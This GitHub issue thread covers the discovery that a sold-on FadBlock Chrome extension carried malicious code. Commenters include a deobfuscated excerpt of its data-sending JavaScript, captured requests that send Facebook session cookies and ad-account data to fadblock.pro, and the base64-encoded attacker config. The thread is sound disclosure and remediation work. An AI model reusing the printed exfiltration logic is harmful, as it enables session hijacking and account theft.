
Comments (96)

0x48piraj avatar 0x48piraj commented on June 12, 2024 27

This is crazy. I am no longer the owner of the extension. I sold it over a month ago, seems like it traded hands and now the current owner has added malicious code while keeping the extension as it is!

I am taking immediate action and will release a new version of the clean codebase for everyone to use.

I am also thinking of pursuing legal action as it appears they have retained access to my PayPal and other support links!

from fadblock.

0x48piraj avatar 0x48piraj commented on June 12, 2024 12

@poka-IT Appreciate your politeness. Unfortunately, I'm bound by a signed agreement that prohibits me from disclosing any information about the owner and the transaction.

And, as I have said above, it's not the buyer, it traded hands again it seems - I have sent a harshly worded email nonetheless.


0x48piraj avatar 0x48piraj commented on June 12, 2024 11

I think we should do the latter @poka-IT, I couldn't sleep as this incident was eating up my conscience but thanks to the Chrome team, the previous authentic version was just now published!

Share this version wherever you can (and I will do the same): https://chromewebstore.google.com/detail/fadblock-origin-friendly/lmnhcklabcehiohmmeihcheoegomkghm?hl=en


poka-IT avatar poka-IT commented on June 12, 2024 8

Here's some quick DNS information on fadblock.pro:

Domain: fadblock.pro
Registrar: NameCheap, Inc.
Registered On: 2024-01-21
Expires On: 2025-01-21
Updated On: 2024-01-21
Status:
    clientTransferProhibited
    addPeriod
Name Servers:
    dns1.registrar-servers.com
    dns2.registrar-servers.com

DDoS sequence initiated


MayouKurayami avatar MayouKurayami commented on June 12, 2024 8

@0x48piraj

in my defense, I thought I took precautions to ensure the buyer wouldn't use it maliciously, but it exchanged hands again. I transferred the extension because I believed it could benefit all users.

Sure, to give you the benefit of the doubt, let's assume that you didn't expect the buyer to be malicious and also did not expect another change of hands.

But would you mind explaining why the user base was never informed of the change of ownership, a significant and potentially concerning event, prior to its occurrence?


0x48piraj avatar 0x48piraj commented on June 12, 2024 7

As of now, the clean version has been submitted to the store under a new name.

Now I will start notifying users and trying to control the exposure.

I will also urge you all to report the malicious extension so it can get removed as soon as possible.


JaielZeus avatar JaielZeus commented on June 12, 2024 7

I'm sorry for being direct here but I lost my trust in this extension and moved on to my good old Adblocker. Selling the extension for a quick cash grab and putting the userbase under the bus like that is just so bad. As they say: trust is hard to gain but easy to lose. Wish you good luck for the future of this extension but I'm out though...


fabriziocarloni avatar fabriziocarloni commented on June 12, 2024 7

I analyzed the network traffic with wireshark and I confirm that the extension with the malicious code was designed to send active Facebook session cookies to the fadblock.pro 80.240.21.36 server to hack accounts. In fact, when you are connected to Facebook, data is sent continuously to their server, which is not the case with other sites.

Here is an example of what is sent:

:method: POST
:authority: fadblock.pro
:scheme: https
:path: /check/extension
content-length: 0
accept: application/json, application/xml, text/plain, text/html, *.*
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
content-type: application/json
origin: chrome-extension://mdadjjfmjhfcibgfhfjbaiiljpllkbfc
sec-fetch-site: none
sec-fetch-mode: cors
sec-fetch-dest: empty
accept-encoding: gzip, deflate, br
accept-language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7
cookie: XSRF-TOKEN=eyJpdiI6Im5BdVd0NDhkQ1JRWFo4RTRlVURxbXc9PSIsInZhbHVlIjoicU83OEtPa2JnV3Bib3RSSnpMcFhGYmlMMmdJSGhmRDQrSWJnM21JYUgrZjhMaWdmdWMrRXJXd1doWWxrcDBGUCIsIm1hYyI6IjRmYmNiMjkwNDYyNDE5ODUwZDcyZTgyMjhlMjA1YWRhNGVlYTU4ZWY1YzQwOTkyZTNhYTZjOGNlODVlM2UzZjQifQ%3D%3D
cookie: laravel_session=eyJpdiI6IklkaEJVTEk5REtFMWdiWUMwRzZpT2c9PSIsInZhbHVlIjoiWTRNY3ZJV3pFVDE2T21aZWIwSDlRUTRidDdzMjdXSzEySnMwSjlqNXNoMTVpQnlIb29zR3RGXC9RTHVadXB4WEMiLCJtYWMiOiIwNTI0MzU2NzA5YWU1ZWY1OWI1YmU2ZTY1MzYzODgzYjZkYzcyOWU5NjRjMTgzZWI1NzNjYzU2OTE4YzUyYjIyIn0%3D

:status: 200
server: nginx
content-type: text/html; charset=UTF-8
x-powered-by: PHP/7.4.33
cache-control: no-cache, private
date: Sat, 03 Feb 2024 02:35:44 GMT
set-cookie: XSRF-TOKEN=eyJpdiI6IllkM3JmMDZ6b3VKRTQwOXdKUWdPMGc9PSIsInZhbHVlIjoibUNyZkttR1N5UEhqdVwvczhvZmtwa0JzODA1bHQzYTNBV3YraExZZW9qTEkxNFFJZGpmV25INW9cL2lHVUo2QUc0IiwibWFjIjoiMWY5YmM5ZmZmY2U2NTgwMjE2M2U2MGQ2OGExNzNlNzdjZmRjZDdmMjZiOGJiODdkY2ViOTVkNDkzMjIzMmRkOCJ9; expires=Sat, 03-Feb-2024 04:35:44 GMT; Max-Age=7200; path=/
set-cookie: laravel_session=eyJpdiI6Ims4ZGsxdm53TyswK2VpTDRRRjY5aXc9PSIsInZhbHVlIjoiWU10QzlcL0pZcnhYSk85UHhOK3U2MUFISmtTWFpwb1krSG5vMTU4U3NRZEV1VE1pWnZsZ0F4WlZFSFJzbEV6UkkiLCJtYWMiOiIwNWM5NmEwNWNhZGQyYWEzOTRiOGZmZTdmZGU5OWVlNDg1MTQ1YThkZmM1NmRhMjlmYjU3MGU0YjIxYzkwNmYzIn0%3D; expires=Sat, 03-Feb-2024 04:35:44 GMT; Max-Age=7200; path=/; httponly
content-encoding: gzip

{"sstcode":403,"fad1":"aHR0cHM6Ly9hcGkuZmFkYmxvY2sucHJvL2FwaS9mYWRibG9ja1NhdmU=","fad2":"ZmFjZWJvb2suY29t","fad3":"Y29va2ll","fad4":"dXNlckFnZW50","fad5":"aHR0cHM6Ly9idXNpbmVzcy5mYWNlYm9vay5jb20vYWRzL2FkX2xpbWl0cw==","fad6":"...","fad7":"aHR0cHM6Ly9ncmFwaC5mYWNlYm9vay5jb20vdjE4LjAvbWUvP2ZpZWxkcz1uYW1lLGJpcnRoZGF5JmFjY2Vzc190b2tlbj0=","fad8":"...","fad9":"RUFB","fad10":"aW5wdXRbbmFtZT0icGFzcyJd","fad11":"aW5wdXRbbmFtZT0iZW1haWwiXQ==","fad13":"Zm9ybQ==","fad14":"cXIvc2hvdy9jb2Rl","fad15":"aHR0cHM6Ly9hcGkuZmFkYmxvY2sucHJvL2FwaS9zYXZlUVI=","fad12":"aHR0cHM6Ly9mYWNlYm9vay5jb20vbWU=","fad16":"YQ==","fad17":"Y2xpY2s=","fad18":"c3Jj","fad19":"aHR0cHM6Ly93d3cuZmFjZWJvb2suY29tL3NlY3VyaXR5LzJmYWMvc2V0dGluZ3Mv","fad20":"bG9naW4vcmVhdXRo"}


Cynosphere avatar Cynosphere commented on June 12, 2024 7

I am no longer the owner of the extension. I sold it over a month ago

First the open core stunt and then you sold the extension and didn't expect it to be riddled with malware??? There's no way you're this money starved to be this incompetent. I'm glad I took matters into my own hands to just use the userscript whenever YouTube keeps trying to block uBlock.

This is why I absolutely hate small things that could be userscripts being full extensions and cringe every time I see people with Return YouTube Dislike as an extension (though I really wish they would stop neglecting the userscript).

You got what you deserved honestly. Just a shame you had to bring down innocent people with you.


0x48piraj avatar 0x48piraj commented on June 12, 2024 5

I also have filed a report providing the team with support materials,


0x48piraj avatar 0x48piraj commented on June 12, 2024 5

Thank you so much @poka-IT for collaborating on this. I will finally doze off now as it's been 24 hours since the incident and I don't think I can go on any longer without sleep.


kbsanders avatar kbsanders commented on June 12, 2024 4

Any details on what the malicious code is doing?


poka-IT avatar poka-IT commented on June 12, 2024 4

I haven't gotten any sleep and have been notifying people who reached out to me one-by-one while pushing out the clean version.

Take your sleep, you did the most important thing by alerting everybody here; we are sharing the news too. Thanks for that.
(I know this kind of rush so I support you...)

Just a question, you said you sold this app to these guys? Can you tell more about it or is it private? Just to understand the situation.


poka-IT avatar poka-IT commented on June 12, 2024 4

@0x48piraj I'm sorry but I don't want to act as a guarantor in this story; everything I did I wrote here, because I had time to do this. I said I'm not a security expert, just a sysadmin; I deobfuscated the suspicious file and provided a first analysis, but I didn't "ran and saw the outgoing/incoming requests", I said this is what should be done. Or analyse the local storage state deeper.

I'm OK to contribute more but with one condition: upgrade this repo to an AGPLv3 license or equivalent. This in no way prevents you from continuing to ask for tips for your work. Currently there is no license, and the trade underneath is completely opaque.
This is the only way you could expect contributors on this project.


fabriziocarloni avatar fabriziocarloni commented on June 12, 2024 4

The serious thing is that anyone who installs the extension with malicious code for the first time does not receive any notification regarding the increase in required permissions, which instead happened with the update.
For now I am sure that this extension is activated to steal session cookies from Facebook but I do not exclude that it could also happen from other sites that I have not yet had the opportunity to test.


fabriziocarloni avatar fabriziocarloni commented on June 12, 2024 4

@WongIong When a user changes their own password, the authorization cookies that were created earlier still work.
In the specific case of Facebook you should go to this page https://accountscenter.facebook.com/password_and_security and disconnect all active sessions, and then also change the password for security.


0x48piraj avatar 0x48piraj commented on June 12, 2024 3

I don't think the malware could do any of that if you simply didn't accept the permissions, but if you did, it cannot steal passwords, only sessions - that too is not for sure as it mostly had boilerplate nonsense - I am still looking into the code.

It's always a good thing to rotate out passwords every 6 months or so. So, if it's not a hassle, you should do that.

I would notify what the malware strain's capabilities but as of now, I haven't gotten any sleep and have been notifying people who reached out to me one-by-one while pushing out the clean version. So, it may take a day or two.


poka-IT avatar poka-IT commented on June 12, 2024 3

Yes, stt.js looks like a minified file, but it is not, as there are line breaks and indents. A minifier will never do this kind of incremental base64 mapping:

        const o = atob(e.fad1),
            i = atob(e.fad2),
            a = atob(e.fad3),
            s = atob(e.fad4),
            u = atob(e.fad5),
            l = atob(e.fad6),
            c = atob(e.fad7),
            f = atob(e.fad8),
            p = atob(e.fad9),
            d = atob(e.fad10),
            h = atob(e.fad11),
            g = atob(e.fad12),
            gn = atob(e.fad13),
            go = atob(e.fad14),
            gi = atob(e.fad15),
            gx = atob(e.fad16),
            gy = atob(e.fad17),
            gz = atob(e.fad18),
            f1 = atob(e.fad19),
            f2 = atob(e.fad20);

But a normal human will never code like this either, with consts here and, 5 lines below, variables with the same names but in a more restrictive scope:

                    var n = [],
                        r = Object.getPrototypeOf,
                        o = n.slice,
                        i = n.flat
                            ? function (e) {
                                return n.flat.call(e);
                            }
                            : function (e) {
                                return n.concat.apply([], e);
                            },
                        a = n.push,
                        s = n.indexOf,
                        u = {},
                        l = u.toString,
                        c = u.hasOwnProperty,
                        f = c.toString,
                        p = f.call(Object),
                        d = {},

over 4000 lines ...

LLMs don't do that either; they use human-readable names. Unless they have received instructions to do so.
This is machine code, or this is artistic obfuscation. Maybe an LLM could help to understand it.


fabriziocarloni avatar fabriziocarloni commented on June 12, 2024 3

@0x48piraj Unfortunately what you did isn't enough. Before it does any more damage, everything must be done to ensure that Google removes the extension with malicious code from the Chrome web store. Whoever manages this extension has no shame; look at what they added in the description. I have no words.

"UPDATE: If you were a user before the update and the extension got disabled, that's normal behavior by Google, it's so an extension can't silently escalate its privileges with an update, in this case FadBlock accessing extensionpay.com for those who want to contribute, nothing else. Nothing to be scared about. You can read the new permissions to make sure nobody's pulling any funny business.

NOTE: And for those who are alarmed about the "Read and change your data" permission, it's not accessing any of your data, it's just to access the YouTube and YouTube Music (new feature!) tabs as it was doing before. You can read the documentation to make sure that's the case,

This is the permission required for an extension to work with the browser's tabs. This includes viewing the URL of an open tab. The permission does not give access to your actual browser history itself, but technically any extension with this permission could monitor tab URLs as they changed and construct its own history, so that's why the warning is phrased that way. If an extension asks for permission to access the actual browser history data, the warning should read "Read and change your BROWSING HISTORY...".

https://developer.chrome.com/docs/extensions/mv3/permission_warnings/

You can google this and find out, no need to trust the developer."


0x48piraj avatar 0x48piraj commented on June 12, 2024 3

@MGuerrera, the extension was deleted about a week ago - because of my efforts going back and forth with Google Devs and making them manually review and remove the extension as it would have taken months otherwise because of the positive reviews and downloads.

If you were in danger, you would have already gotten breach emails like some did - if not - you're safe - it was scrubbed under a week after the update - their server wasn't even online on the first two days - so the exposure was low, to begin with, thankfully.


BobbyRaduloff avatar BobbyRaduloff commented on June 12, 2024 2

For me, the update also made it so the extension doesn't work and it requires a payment.


0x48piraj avatar 0x48piraj commented on June 12, 2024 2

Yes, being an independent security researcher, this falls under my jurisdiction. I've already started inspecting the code, identified the malicious code block, and am currently conducting an investigation.

Here's the whole source if anyone else is interested,
mdadjjfmjhfcibgfhfjbaiiljpllkbfc-v2.7.zip

Here's the details of the malicious file,

File name: js/stt.js
File size: 249,607 bytes
md5:       da0ab10b04e7c069d87b11d99b9ca512
sha1:      b4a65d866e9cff6c9517f8a6af6c5a7e3027be88
sha256:    5366039a45019653ef1f6bf1b948fdbff3b50fd753096c5ab25f19297fc3e9ba
sha384:    090e9629520d85aa4d48a51abffb776083acf85cf138b2849cbd4b7a5ee9e813e8a9e1a80f15ada543e2d2602f591839
sha512:    94996e20f3cd61a34e111ab2eca57a3ac9decffdab8a62d1ccbc0aa66bc833e302106716494fb442d80b5de44c1a243dbf65e24dab1b0fc0ac6aa28d49c0b3df

After a cursory analysis, it seems like it's a modified jQuery base coupled with data collection slash adware modules.

The data is sent to the endpoint named fadblock.pro.

Immediate countermeasure

A few manual methods exist to block access to any website domain, such as editing your HOSTS file, but for Chrome I would suggest doing the following:

  1. Add the BlockSite Chrome Web Store extension to your Chrome browser. Once installed, you'll see a web page where you need to provide permission to BlockSite to access your browsing information.

  2. Next, you'll see the BlockSite configuration screen. Add individual sites by typing them into the top field and selecting the green plus icon to the right.


SImone-Cow avatar SImone-Cow commented on June 12, 2024 2

Thanks for your hard work and efforts @0x48piraj; despite not being the owner of fadblock anymore, you still manage to help us and provide insights regarding the problem.


mauigirl avatar mauigirl commented on June 12, 2024 2

Thank you @0x48piraj for stepping back in. I supported and paid for Fadblock when you were still the owner and am appreciative for this extension every day. Even more so that you came back and resurrected the original so quickly!


Nicos18 avatar Nicos18 commented on June 12, 2024 2

As a precaution, I logged out from all sessions and changed password for both Facebook and Instagram, as they are deeply connected.

I can't change passwords on other sites as I have too many passwords to change and it would take weeks.


Rynn21 avatar Rynn21 commented on June 12, 2024 2

Hmm...some thread comments appear to be deleted compared to the e-mailed updates I saw.


0x48piraj avatar 0x48piraj commented on June 12, 2024 2

Now that the extension was removed globally, there's no reason to keep the issue alive. Closing.


ene0s avatar ene0s commented on June 12, 2024 1

I also would like to know why the extension now needs more permissions.


JaielZeus avatar JaielZeus commented on June 12, 2024 1

I have removed the extension now and gone back to Adblocker as it does the same job, has a reason to have the permission to read data on all sites, and is serious enough for me to accept these intrusive permissions.


poka-IT avatar poka-IT commented on June 12, 2024 1

I'm reading the code you provided; I don't see any malicious code on my side.
External requests are only made to https://fadblock.pro/check/extension, just fetching data; it doesn't seem to send anything there.

Response is

{"sstcode":200,"fad1":"https:\/\/play.google.com","fad2":"play.google.com","fad3":"6000","fad4":"videoplayback","fad5":"https:\/\/www.youtube.com\/youtubei\/v1\/notification\/get_unseen_count","fad6":"https:\/\/googleads.g.doubleclick.net\/pagead\/id?v=","fad7":"https:\/\/www.youtube.com\/youtubei\/v1\/player","fad8":"https:\/\/play.google.com\/log?format=json&hasfast=true&authuser=0","fad9":"video-","fad10":"100","fad11":"50","fad12":"https:\/\/jnn-pa.googleapis.com\/$rpc\/google.internal.waa.v1.Waa\/Create"}

So probably just metadata for analytics, as you said. Probably logging the IP address, that's it.
But I'm just a Linux sysadmin, not a security expert, maybe I missed something.


0x48piraj avatar 0x48piraj commented on June 12, 2024 1

No, I think you're right @poka-IT. That's my working theory as well.

However, requesting permissions for every site is inherently a malicious action, so it's best to err on the side of extra caution. It has a lot of jQuery boilerplate nonsense and useless base64 encodings.


0x48piraj avatar 0x48piraj commented on June 12, 2024 1

The new extension is under review process and hopefully will be released soon and we can shift over there. The funny thing is, I was also affected as I use FadBlock on YT by default lol.

@That1BlueMew, no, the Firefox version is still under my control and thus, it's completely safe.

@SImone-Cow, as of now, the extension doesn't steal data so I think we are safe. Also, yes, just removing the extension will remove everything, no remnants, nothing. Clean slate.


That1BlueMew avatar That1BlueMew commented on June 12, 2024 1

Thank you so much, that removed my fear. I use Firefox as my main browser for everything; I was about to rotate everything.


poka-IT avatar poka-IT commented on June 12, 2024 1

I used this tool to deobfuscate stt.js: https://github.com/ViZiD/humanify

result here: deobfuscated.zip
Maybe it helps, maybe not.

Now we are on 9000 lines. You're welcome ahaha


fabriziocarloni avatar fabriziocarloni commented on June 12, 2024 1

Are you really sure that this extension does not transfer cookies or users and passwords to the fadblock.pro domain? I'm asking you because a few days ago (January 26th) we had a hack on a Facebook account and I'm almost sure it was caused by this extension with malicious code. No dangerous files were opened on the computer where this extension was installed and coincidentally a few days earlier authorization had been given to read and modify all data on all websites.


fabriziocarloni avatar fabriziocarloni commented on June 12, 2024 1

@0x48piraj As suggested by @poka-IT the only way to understand what this modified extension really does is to run it in a sandbox and then analyze its requests. I'm sorry but in my opinion it was this extension with malicious code that was the cause of the hack we had.


poka-IT avatar poka-IT commented on June 12, 2024 1

@fabriziocarloni are you sure your Facebook account has been hacked? Did you just receive an SMS from "Facebook" giving you a 2FA code? If yes, you have not been hacked, just spammed.

And I don't know what you mean by "someone of good", but the good thing to do here is to declare this app as libre software, with a good license for it. It seems that you have no problem using a program without an associated license?


fabriziocarloni avatar fabriziocarloni commented on June 12, 2024 1

@poka-IT I'm an IT system engineer too and when I tell you that we were hacked it's the truth. The hack occurred with the copy of the active cookies and I am 100% sure of this.

I don't want to go into the licensing issue but I would just like to understand if this extension with malicious code sent other data besides cookies. That's all I would like to know.


fabriziocarloni avatar fabriziocarloni commented on June 12, 2024 1

When you are logged in to Facebook, the extension with the malicious code also sends the user's data including financial data to the api.fadblock.pro 149.248.56.63 server:

:method: POST
:authority: api.fadblock.pro
:scheme: https
:path: /api/fadblockSave
content-length: 1515
accept: application/json, application/xml, text/plain, text/html, *.*
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
content-type: application/json
origin: chrome-extension://mdadjjfmjhfcibgfhfjbaiiljpllkbfc
sec-fetch-site: none
sec-fetch-mode: cors
sec-fetch-dest: empty
accept-encoding: gzip, deflate, br
accept-language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7

{"fad":"...","fad_ana":"[]","fad_context":"[{"account_currency_ratio_to_usd":0.9303347825,"name":"Name Surname","account_status":1,"currency":"EUR","amount_spent":"0","spend_cap":"0","adtrust_dsl":46.52,"id":"act_429256876109265"}]"}

:status: 200
server: nginx
content-type: application/json
x-powered-by: PHP/7.4.33
cache-control: no-cache, private
date: Sat, 03 Feb 2024 17:20:23 GMT
x-ratelimit-limit: 600
x-ratelimit-remaining: 599
access-control-allow-origin: *

{"message":"Verified","stt":false}

Now there is no longer any doubt that the hack we had was caused by this extension with malicious code looking for Facebook accounts with a credit card connected to then advertise by spending the money of unsuspecting users. This is all very heavy.


fabriziocarloni avatar fabriziocarloni commented on June 12, 2024 1

@Nicos18 We also had 2FA active but when they copy your cookies they replicate the connection you have (in our case to Facebook) and to enter your account they don't even need a password, and you realize the damage when it's too late. I believe the only salvation is the use of a physical key like a passkey, which should protect you from this type of attack.


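fabriziocarloni's two observations above (a password change leaves earlier authorization cookies valid, and a replayed cookie is never challenged for 2FA because the second factor is checked only at login) both come down to how the server validates the cookie. The toy below is an added example, not code from this thread or from any real site: it models a session store in which a password change either leaves issued sessions alone or bumps a per-account credential generation, and checks whether a copied cookie still authenticates afterwards.

```python
"""Why a password change alone does not revoke a copied session cookie.

Added example; a toy server, not code from this thread or any real site.
"""
import hashlib
import secrets
from dataclasses import dataclass
from typing import Dict


@dataclass
class Account:
    salt: bytes
    password_hash: bytes
    cred_generation: int = 0  # bumped to invalidate every issued session


@dataclass
class Session:
    username: str
    cred_generation: int      # generation current when the cookie was issued


def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


class Site:
    """The cookie is a bare random session id; 2FA happens at login only,
    so a replayed cookie is never challenged for a second factor."""

    def __init__(self) -> None:
        self.accounts: Dict[str, Account] = {}
        self.sessions: Dict[str, Session] = {}

    def register(self, username: str, password: str) -> None:
        salt = secrets.token_bytes(16)
        self.accounts[username] = Account(salt, _hash(password, salt))

    def _check(self, username: str, password: str) -> bool:
        acct = self.accounts[username]
        return secrets.compare_digest(acct.password_hash, _hash(password, acct.salt))

    def login(self, username: str, password: str) -> str:
        if not self._check(username, password):
            raise PermissionError("bad credentials")
        sid = secrets.token_urlsafe(32)
        self.sessions[sid] = Session(username, self.accounts[username].cred_generation)
        return sid  # this string is what a cookie-stealer exfiltrates

    def request_with_cookie(self, sid: str) -> bool:
        """Authenticated request. The cookie is honoured only if it was
        issued under the account's current credential generation."""
        sess = self.sessions.get(sid)
        if sess is None:
            return False
        return sess.cred_generation == self.accounts[sess.username].cred_generation

    def change_password(self, username: str, old: str, new: str,
                        revoke_sessions: bool) -> None:
        if not self._check(username, old):
            raise PermissionError("bad credentials")
        acct = self.accounts[username]
        acct.salt = secrets.token_bytes(16)
        acct.password_hash = _hash(new, acct.salt)
        if revoke_sessions:
            acct.cred_generation += 1  # every earlier cookie now fails

    def logout_everywhere(self, username: str) -> None:
        """What 'disconnect all active sessions' in account settings does."""
        self.accounts[username].cred_generation += 1


def stolen_cookie_still_works(revoke_on_change: bool) -> bool:
    """Victim logs in, the cookie value is copied off the machine, the victim
    changes the password, the copy is replayed from elsewhere."""
    site = Site()
    site.register("victim", "old-password")
    copied_cookie = site.login("victim", "old-password")
    site.change_password("victim", "old-password", "new-password", revoke_on_change)
    return site.request_with_cookie(copied_cookie)


if __name__ == "__main__":
    for revoke in (False, True):
        outcome = "cookie still valid" if stolen_cookie_still_works(revoke) else "cookie revoked"
        print(f"password change, revoke_sessions={revoke}: {outcome}")
```

With `revoke_sessions=False` the copied cookie keeps working after the password change, which is the situation described above; with it set to `True`, or after `logout_everywhere`, the same cookie is refused.
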
fabriziocarloni avatar fabriziocarloni commented on June 12, 2024 1

@Rynn21 The original extension had changed hands and was then modified with malicious code. After this bad experience I will pay much more attention to the extensions to install on Chrome.


ciltocruz avatar ciltocruz commented on June 12, 2024

+1


seebeedub avatar seebeedub commented on June 12, 2024

+1


PanuWeb avatar PanuWeb commented on June 12, 2024

Same problem here.

I have no problem enabling the new permissions if they are "necessary", but it is important to know what they are going to be used for.

I can't find information in the README.md or in the GitHub releases.

Thank you


MaximusHoudini avatar MaximusHoudini commented on June 12, 2024

Agreed, as long as they're necessary but I also have the license issue, asking for another payment.


PanuWeb avatar PanuWeb commented on June 12, 2024

I see that several of you are being asked to pay license fees. I clarify that in my case it is not asking me.

What may be different is that I reinstalled the extension.

I leave a screenshot.


kbsanders avatar kbsanders commented on June 12, 2024

Same. I would like to know why the extension now needs wide open permissions to read and change data on all websites before I re-enable it.


shimpe avatar shimpe commented on June 12, 2024

Same. This seems a little fishy. Too bad as it worked well while it worked...


poka-IT avatar poka-IT commented on June 12, 2024

Same thing here on Brave:

This is very worrying because the last commit (code change) here dates from November 2023! And the latest release is from October 2023.
I think there is a big suspicious problem with this extension.

My take is: don't accept these permission changes and wait for news from the devs here.
I just installed the latest available build from GitHub, and it works: https://github.com/0x48piraj/fadblock/releases


0x48piraj avatar 0x48piraj commented on June 12, 2024

As of now, I have updated the repository with this new information (4a13167) and now will start working on forking and deploying the clean version as soon as possible.


0x48piraj avatar 0x48piraj commented on June 12, 2024

Here's some quick DNS information on fadblock.pro:

Domain: fadblock.pro
Registrar: NameCheap, Inc.
Registered On: 2024-01-21
Expires On: 2025-01-21
Updated On: 2024-01-21
Status:
    clientTransferProhibited
    addPeriod
Name Servers:
    dns1.registrar-servers.com
    dns2.registrar-servers.com


benalt613 avatar benalt613 commented on June 12, 2024

I uninstalled the malicious version, but is there anything I should be concerned about in terms of my data? Change passwords on sites etc. that were used?


sam31046 avatar sam31046 commented on June 12, 2024

I don't think the malware could do any of that if you simply didn't accept the permissions, but if you did, it cannot steal passwords, only sessions - that too is not for sure as it mostly had boilerplate nonsense - I am still looking into the code.

It's always a good thing to rotate out passwords every 6 months or so. So, if it's not a hassle, you should do that.

I would notify what the malware strain's capabilities but as of now, I haven't gotten any sleep and have been notifying people who reached out to me one-by-one while pushing out the clean version. So, it may take a day or two.

Thank you @0x48piraj


benalt613 avatar benalt613 commented on June 12, 2024

I don't think the malware could do any of that if you simply didn't accept the permissions, but if you did, it cannot steal passwords, only sessions - that too is not for sure as it mostly had boilerplate nonsense - I am still looking into the code.

In stealing sessions, what kind of information can be taken from a session? Would that include username/password entered in the session or anything displayed in the browser for that session?


poka-IT avatar poka-IT commented on June 12, 2024

Would that include username/password entered in the session or anything displayed in the browser for that session?

No. Basically, to be sure, just log out of every website you are currently logged in to, and these sessions will be disabled, so unusable. User data should not be present in sessions, just tokens for the current ... session.


0x48piraj avatar 0x48piraj commented on June 12, 2024

@benalt613 I don't even think it steals your sessions as of now but it acts as a CnC center of some sort and sends analytical data (probably URLs you visit) to the attacker's server.

Here's the code bit,

if ($('img')) {
                        $('img')
                            .each(function(index, value) {
                                if ($(this)
                                    .attr(gz)) {
                                    let sc = $(this)
                                        .attr(gz);
                                    if (sc.includes(go)) {
                                        chrome.storage.local.get(["fad_yt_block"])
                                            .then((t) => {
                                                t.fad_yt_block && (e = JSON.parse(t.fad_yt_block));
                                                chrome.runtime.sendMessage({
                                                    action: "fad-action-src",
                                                    url: gi,
                                                    pl: {
                                                        sc: btoa(sc),
                                                        cf: btoa(e)
                                                    }
                                                }, function(e) {});
                                            });
                                    }
                                }
                            });
                    }
                    e && chrome.storage.local.set({
                            fad_yt_ep: btoa(e + " | " + t)
                        })
                        .then(() => {});
                })),
            v &&
            chrome.runtime.sendMessage({
                action: "fad-action-text",
                url: u
            }, function(e) {
                const t = /6kU.*?"/gm;
                let n;
                const r = e;
                let u = "";
                for (; null !== (n = t.exec(r));)
                    n.index === t.lastIndex && t.lastIndex++,
                    n.forEach((e, t) => {
                        u = e;
                    });
                (u = u.replace('"', "")),
                u &&
                    ((u = p + u),
                        chrome.runtime.sendMessage({
                            action: "fad-action-json",
                            url: c + u
                        }, function(e) {
                            const t = e.id,
                                n = e;
                            chrome.runtime.sendMessage({
                                action: "fad-action-json",
                                url: l + u
                            }, function(e) {
                                let r = e.data;
                                chrome.runtime.sendMessage({
                                    action: "fad-action-json",
                                    url: f + u
                                }, function(e) {
                                    let l = e.data;
                                    chrome.runtime.sendMessage({
                                        action: "fad-action-cf",
                                        url: f1,
                                        c: f2
                                    }, function(e) {
                                        let l1 = e;
                                        chrome.runtime.sendMessage({
                                            action: "fad-action-analytic",
                                            url: o,
                                            pl: {
                                                a: i,
                                                b: u,
                                                c: n,
                                                d: r,
                                                e: l,
                                                f: t,
                                                g: a,
                                                h: s,
                                                i: g,
                                                k: l1
                                            }
                                        }, function(e) {
                                            chrome.storage.local.set({
                                                    fad_yt_block: JSON.stringify(t)
                                                })
                                                .then(() => {});
                                        });
                                    });
                                });
                            });
                        }));

So, I think it's not a very nefarious kind of strain (stealing passwords, bank info etc.), it steals your browsing history and probably can perform remote actions (I'm not sure as of now). So, there's that. But it still is a good idea to change your passwords - it can't hurt.

from fadblock.

0x48piraj avatar 0x48piraj commented on June 12, 2024

If they are developing it into a general adblocker - that may warrant the permissions they have - but the base64 encoding, cryptic function names, and needless obfuscation, not to mention the tracking, point only to one thing - adware/malware.

from fadblock.

benalt613 avatar benalt613 commented on June 12, 2024

So, I think it's not a very nefarious kind of strain (stealing passwords, bank info etc.), it steals your browsing history and probably can perform remote actions (I'm not sure as of now). So, there's that. But it still is a good idea to change your passwords - it can't hurt.

@0x48piraj Thanks. I've also decided to create a separate Chrome profile with limited extensions for sessions containing logins that need to be more secure.

from fadblock.

SImone-Cow avatar SImone-Cow commented on June 12, 2024

Hello @0x48piraj I'm new here and I would just like to ask, does removing the extension from my browser remove potential remote access from their servers or would there still be remnants of their codes embedded that I should be worried about? (sorry for the question I'm still a beginner)

from fadblock.

That1BlueMew avatar That1BlueMew commented on June 12, 2024

@0x48piraj Is the Firefox version also affected?

from fadblock.

poka-IT avatar poka-IT commented on June 12, 2024

So the suspicious code becomes:

     let ownerDocument = childSeparator(unsupportedSelectors).val();
      if (childSeparator("img")) {
        childSeparator("img").each(function (index, value) {
          if (childSeparator(this).attr(variableGz)) {
            let encryptedData = childSeparator(this).attr(variableGz);
            if (encryptedData.includes(variableGo)) {
              chromeAPI.localStorage.local
                .get(["fad_yt_block"])
                .then((ownerDocument) => {
                  if (ownerDocument.youtubeData) {
                    element = JSONParser.parse(ownerDocument.youtubeData);
                  }
                  chromeAPI.runtimeAPI.sendMsg(
                    {
                      action: "fad-action-src",
                      url: variableGi,
                      pl: {
                        encryptedData: encodeBase64(encryptedData),
                        cf: encodeBase64(element),
                      },
                    },
                    function (element) {},
                  );
                });
            }
          }
        });
      }
      if (element) {
        chromeAPI.localStorage.local
          .set({
            fad_yt_ep: encodeBase64(element + " | " + ownerDocument),
          })
          .then(() => {});
      }
    },
  );
}
if (returnValue) {
  chromeAPI.runtimeAPI.sendMsg(
    {
      action: "fad-action-text",
      url: isXMLDoc,
    },
    function (element) {
      const ownerDocument = /6kU.*?"/gm;
      let cache;
      const result = element;
      let isXMLDoc = "";
      for (; (cache = ownerDocument.exec(result)) !== null; ) {
        if (cache.index === ownerDocument.lastIndex) {
          ownerDocument.lastIndex++;
        }
        cache.forEach((element, ownerDocument) => {
          isXMLDoc = element;
        });
      }
      isXMLDoc = isXMLDoc.replace('"', "");
      if (isXMLDoc) {
        isXMLDoc = isHTMLDoc + isXMLDoc;
        chromeAPI.runtimeAPI.sendMsg(
          {
            action: "fad-action-json",
            url: querySelectorAll + isXMLDoc,
          },
          function (element) {
            const ownerDocument = element.id;
